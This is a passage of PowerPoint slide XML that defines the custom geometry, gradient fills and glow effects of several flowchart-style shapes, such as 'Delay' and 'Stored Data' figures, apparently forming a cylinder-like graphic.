                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
